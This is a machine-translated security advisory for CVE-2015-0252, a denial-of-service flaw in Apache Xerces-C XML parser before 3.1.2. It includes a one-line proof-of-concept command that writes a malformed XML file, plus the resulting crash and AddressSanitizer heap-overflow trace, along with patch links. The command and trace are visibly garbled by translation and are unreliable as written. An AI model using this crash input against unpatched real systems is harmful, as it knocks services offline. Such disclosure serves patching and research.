Apache Xerces-c xml Parser & lt; 3.1.2 DoS Vulnerability

Last Update:2015-05-09 Source: Internet

Author: User

Tags xml parser cve

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Apache Xerces-c xml Parser <3.1.2 DoS Vulnerability
Apache Xerces-c xml Parser <3.1.2 DoS Vulnerability

Release date:
Updated on:

Affected Systems:

Apache Group Xerces C++ < 3.1.2

Description:

CVE (CAN) ID: CVE-2015-0252

Xerces is an open-source XML document parsing project promoted by the Apache organization. It currently has multiple language versions, including JAVA, C ++, PERL, and COM.

In versions earlier than Apache Xerces-C 3.1.2, internal/XMLReader. cpp has a security vulnerability. Remote attackers can exploit XML data to cause DoS (segmentation errors and crashes ).

<* Source: vendor
*>

Test method:

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

Vendor () provides the following test methods:

# Exploit Title: Apache Xerces-c xml Parser (<3.1.2) DoS POC
# Date: 2015-05-03
# Exploit Author: beford
# Vendorhomepage: http://xerces.apache.org/#xerces-c
# Version: Versions prior to 3.1.2
# Tested on: Ubuntu 15.04
# CVE: CVE-2015-0252

Apache Xerces-c xml Parser Crashes on Malformed Input

I believe this to be the same issue that was reported on CVE-2015-0252,
Posting this in case anyone is interested in reproducing it.

Original advisory:
Https://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

$ Printf "\ xff \ xfe \ x00 \ x00 \ x3c"> file. xml

$ DOMPrint./file. xml # Ubuntu 15.04 libxerces-c3.1 package
Segmentation fault

$./DOMPrint./file. xml # using Enabled build
========================================================== ======================================
= 6831 = ERROR: AddressSanitizer: heap-buffer-overflow on address 0xb5d9d87c
At pc 0x836a721 bp 0xbf80000a8 sp 0xbf8000098
READ of size 1 at 0xb5d9d87c thread T0
#0 0x836a720 in xercesc_3_1: XMLReader: refreshRawBuffer ()
Xercesc/internal/XMLReader. cpp: 1719
#1 0x836a720 in xercesc_3_1: XMLReader: xcodeMoreChars (unsigned short *,
Unsigned char *, unsigned int) xercesc/internal/XMLReader. cpp: 1761
#2 0x837183f in xercesc_3_1: XMLReader: refreshCharBuffer ()
Xercesc/internal/XMLReader. cpp: 576
#3 0x837183f in xercesc_3_1: XMLReader: peekString (unsigned short
Const *) xercesc/internal/XMLReader. cpp: 1223
#4 0x83ad0ae in xercesc_3_1: ReaderMgr: peekString (unsigned short
Const *) xercesc/internal/ReaderMgr. hpp: 385
#5 0x83ad0ae in xercesc_3_1: xmlparser: checkXMLDecl (bool)
Xercesc/internal/xmlworkflow. cpp: 1608
#6 0x83b6469 in xercesc_3_1: xmllogs: scanProlog ()
Xercesc/internal/xmlworkflow. cpp: 1244
#7 0x8d69220 in
Xercesc_3_1: igxml1_:: scanDocument (xercesc_3_1: InputSource const &)
Xercesc/internal/igxmlworkflow. cpp: 206
#8 0x83cd3e7 in xercesc_3_1: xmldocument: scanDocument (unsigned short
Const *) xercesc/internal/xmlworkflow. cpp: 400
#9 0x83ce728 in xercesc_3_1: xmldocument: scanDocument (char const *)
Xercesc/internal/xmlworkflow. cpp: 408
#10 0x849afc5 in xercesc_3_1: AbstractDOMParser: parse (char const *)
Xercesc/parsers/AbstractDOMParser. cpp: 601
#11 0x8050bf2 in main src/DOMPrint. cpp: 398
#12 0xb6f5272d in _ libc_start_main
(/Lib/i386-linux-gnu/libc. so.6 + 0x1872d)
#13 0x805d3b5 (/ramdisk/DOMPrint + 0x805d3b5)

0xb5d9d87c is located 0 bytes to the right of 163964-byte region
[0xb5d75800, 0xb5d9d87c)
Allocated by thread T0 here:
#0 0xb72c3ae4 in operator new (unsigned int)
(/Usr/lib/i386-linux-gnu/libasan. so.1 + 0x51ae4)
#1 0x8340cce in xercesc_3_1: MemoryManagerImpl: allocate (unsigned int)
Xercesc/internal/MemoryManagerImpl. cpp: 40
#2 0x8094cb2 in xercesc_3_1: XMemory: operator new (unsigned int,
Xercesc_3_1: MemoryManager *) xercesc/util/XMemory. cpp: 68
#3 0x8daaaa7 in
Xercesc_3_1: igxml1_:: scanReset (xercesc_3_1: InputSource const &)
Xercesc/internal/IGXMLScanner2.cpp: 1284
#4 0x8d6912a in
Xercesc_3_1: igxml1_:: scanDocument (xercesc_3_1: InputSource const &)
Xercesc/internal/igxmlworkflow. cpp: 198
#5 0x83cd3e7 in xercesc_3_1: xmldocument: scanDocument (unsigned short
Const *) xercesc/internal/xmlworkflow. cpp: 400
#6 0x83ce728 in xercesc_3_1: xmldocument: scanDocument (char const *)
Xercesc/internal/xmlworkflow. cpp: 408
#7 0x849afc5 in xercesc_3_1: AbstractDOMParser: parse (char const *)
Xercesc/parsers/AbstractDOMParser. cpp: 601
#8 0x8050bf2 in main src/DOMPrint. cpp: 398
#9 0xb6f5272d in _ libc_start_main
(/Lib/i386-linux-gnu/libc. so.6 + 0x1872d)

SUMMARY: AddressSanitizer: heap-buffer-overflow
Xercesc/internal/XMLReader. cpp: 1719
Xercesc_3_1: XMLReader: refreshRawBuffer ()

Suggestion:

Vendor patch:

Apache Group
------------
The vendor has released a patch to fix this security problem. Please download it from the vendor's homepage:

Http://xerces.apache.org/xerces-c/secadv/CVE-2015-0252.txt

Http://svn.apache.org/viewvc? View = revision & revision = 1667870

This article permanently updates the link address:

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More